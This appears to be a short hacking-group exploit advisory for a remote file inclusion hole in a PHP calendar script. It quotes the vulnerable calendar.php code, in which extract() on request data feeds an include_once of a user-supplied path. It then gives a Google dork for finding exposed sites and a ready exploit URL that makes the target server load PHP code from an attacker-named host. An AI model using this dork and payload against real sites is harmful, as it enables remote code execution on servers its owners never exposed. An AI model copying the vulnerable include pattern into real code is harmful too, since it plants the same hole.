#############################SolpotCrew Community################################
#################################################################################
################################################################################
###############################################################################
Input passed to the "path_to_calendar" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from calendar.php
if(!$path_to_calendar){
$path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
global $db,$path_to_data,$settings;
Google dork : inurl:/cl_files/
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################